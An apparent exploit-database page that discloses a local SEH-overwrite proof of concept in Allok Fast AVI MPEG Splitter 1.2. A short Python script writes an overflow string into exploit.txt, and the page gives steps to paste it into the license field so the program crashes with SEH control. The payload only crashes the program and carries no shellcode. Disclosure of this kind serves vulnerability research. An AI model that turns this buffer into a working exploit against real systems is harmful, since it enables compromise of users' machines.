Allok Fast AVI MPEG Splitter 1.2 SEH Overwrite

2018.08.02
Credit: Shubham Singh
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#!/usr/bin/env python # Exploit Title : Allok Fast AVI MPEG Splitter 1.2 SEH Overwrite POC # Vulnerability Type: SEH Overwrite POC # Discovery by : Shubham Singh # Known As : Spirited Wolf [Twitter: @Pwsecspirit] # Email : spiritedwolf@protonmail.com # Youtube Channel : www.youtube.com/c/Pentestingwithspirit # Discovey Date : 01/08/2018 # Software Link : http://www.alloksoft.com/fast_splitter.htm # Tested Version : 1.2 # Tested on OS : Windows XP Service Pack 3 x86 # Steps to Reproduce: # Run the python exploit.py , Open "exploit.txt" and copy content. # Open Fast AVI MPEG Splitter , A registration prompt will appear. # In the License field paste the content of "exploit.txt". # Press "OK" and B00m Crashed. #SEH chain of main thread, item 0 # Address=00129B78 # SE handler=43434343 #SEH chain of main thread, item 1 # Address=42424242 # SE handler=*** CORRUPT ENTRY *** buffer = "\x41" * 544 nseh = "\x42\x42\x42\x42" seh= "\x43\x43\x43\x43" exploit = buffer + nseh + seh f = open ("exploit.txt", "w") f.write(exploit) f.close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top